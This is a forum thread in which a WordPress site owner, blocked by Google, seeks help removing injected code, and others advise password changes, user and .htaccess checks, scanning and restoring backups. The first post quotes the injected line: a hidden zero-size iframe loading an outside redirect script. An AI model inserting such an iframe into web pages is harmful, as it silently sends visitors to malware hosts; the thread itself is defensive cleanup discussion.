Grow your CSS skills. Land your dream job.

Removing malicious code on my WordPress site

  • # February 14, 2012 at 1:16 pm

    Google has blocked my site and says it found this malicious code.

    <iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0">
    

    They say it is here…

    http://mywebsite.com/blog/page/10/

    How exactly do I find that? I dont know of a page 10.

    # February 14, 2012 at 2:44 pm

    Change all passwords and do a search through your theme for any malicious code, usually some form of base64. If a bunch of pages are infected, sometimes it’s best to simply roll the site back to a previous version (shouldn’t effect the database).

    # February 14, 2012 at 2:52 pm

    I already know what the malicious code is. I noted it above. My question is where is this location? http://mywebsite.com/blog/page/10/

    I dont see a “blog” folder or a “page” folder in my wordpress install.

    # February 14, 2012 at 4:34 pm

    Check your .htaccess, check to see if there are any additional users in your WP backend, check the pages in your backend, etc.

    There may be more malicious code than just that.

    # February 15, 2012 at 1:27 pm

    Ok this plugin found it for me.
    http://wordpress.org/extend/plugins/exploit-scanner/

    The malicious code was placed in every index.php file on my site.

    # June 10, 2014 at 9:29 am

    The malicious code was placed in every index.php file on my site.

    Placed in, but that’s not where it came from. I hope you take note of what @TheDoc said: you need to change passwords (site, database, web host), check for unknown users or users who are admins but shouldn’t be, check your entire web hosting space for files that shouldn’t be there.

    In general, trying to “fix” things after an attack is the wrong approach. Your very best option is to delete everything (even if you think it’s “okay”) and then re-install + restore from a backup that you know is good.

    If you haven’t made preparations for this sort of thing, you can be ready next time: keep a clean backup of all your code, backup your database and resources (css, js files, images, etc.) regularly. Keep your backups on a different computer than your live site.

Viewing 6 posts - 1 through 6 (of 6 total)

You must be logged in to reply to this topic.

*May or may not contain any actual "CSS" or "Tricks".